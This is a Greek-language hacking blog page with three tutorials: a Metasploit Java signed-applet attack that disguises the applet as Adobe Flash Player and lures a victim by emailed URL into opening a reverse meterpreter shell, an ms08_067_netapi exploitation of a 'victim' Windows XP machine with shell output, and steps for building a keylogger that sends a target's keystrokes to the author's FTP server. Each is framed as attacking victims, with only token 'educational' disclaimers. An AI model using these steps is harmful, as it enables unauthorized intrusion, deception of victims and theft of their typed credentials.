!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****
Εμφάνιση αναρτήσεων με ετικέτα Metasploit. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Metasploit. Εμφάνιση όλων των αναρτήσεων

Πέμπτη 7 Μαρτίου 2013

Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3


Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :
1. Metasploit Framework
2. Operating System(Προτείνω Linux OS ή Backtrack 5)

Βήμα προς Βήμα:
Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|


Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:

use exploit/multi/browser/java_signed_applet <-| (φορτίζουμε το java_signed_applet exploit)
set payload windows/meterpreter/reverse_tcp <-| (ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)

Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...

Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|
set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)
set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)
set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 <-| (η διεύθυνση μας)
set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)
exploit <-| (έναρξη έκθεσης...)

Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.
Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:

Terminal: session -l <-| (για να δω τα ενεργά session)
Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..
session -i <-|
Τέλος μας εμφανίζει στην οθόνη meterpreter> που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Παρασκευή 22 Φεβρουαρίου 2013

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_067_netapi exploit - Backtrack 5 R1


Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.
Πρώτα απ όλα πρέπει να έχουμε εγκατεστημένο το BackTrack 5 R1 στον υπολογιστή μας. Στη συνέχεια ανοίγουμε ένα τερματικό και ακολουθούμε τη σειρά εντολών που αναφέρω παρακάτω:
Ανοίγω ένα τερματικό...
Terminal:
root@bt:msfconsole <-|
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <-|

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack


Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <-|
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <-| (victim ip)
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <-|
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options <-|
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <-| (attacker ip)
LHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > exploit <-|

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GAME OVER!!!

Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Σάββατο 2 Φεβρουαρίου 2013

Φτιάξτε εύκολα ένα Keylogger...

Τι είναι τα Keyloggers


Τα keyloggers είναι επιβλαβή προγράμματα που εκτελούνται σχεδόν αόρατα, καταγράφουν όλες τις πληροφορίες που πληκτρολογείτε και στη συνεχεία, στέλνουν πληροφορίες σ΄αυτόν που σας έχει μολύνει με το keylogger.

Δημιουργία ενός Keylogger

Για να φτιάξουμε έναν Keylogger θα χρησιμοποιήσουμε το Albertino Keylogger Creator. Μετά ανοίγουμε το AKC-Final αρχείο και θα έχουμε την παρακάτω εικόνα:

 

Επιλέγουμε έναν ftp server που θα μας στέλνονται αυτά που "υποκλέπτουμε" και απο κάτω βάζουμε το φάκελο του ftp μας.Προσοχή βάζουμε ένα / πριν το φάκελο.
Βάζουμε το username και το password. Βάζουμε καθε πόσα λεπτά θέλουμε να ανεβαίνουνε αυτά που καταγράφει ο keylogger και ποιο θα είναι το όριο ανεβάσματος αρχείου.



Μετά πατάμε Check Ftp settings και αν όλα ειναι εντάξει θα μας βγάλει:



Μετά αν θέλουμε μπορουμε να προσθέσουμε και άλλες ρυθμίσεις πατώντας keylogger settings.

 

Μετά πατάμε Generate.

 

Έπειτα θα μας βγάλει ένα κουμπί που λέγεται Compile και το πατάμε.

Και αν όλα είναι εντάξει θα μας βγάλει:
 

Έτοιμο! Θα το βρείτε στο φάκελο Keylogger.

 

Αυτό μπορείτε να το στείλετε σε κάποιον και αυτό θα υποκλέψει οτι γράφει το θύμα και θα σας σταλούν στον ftp.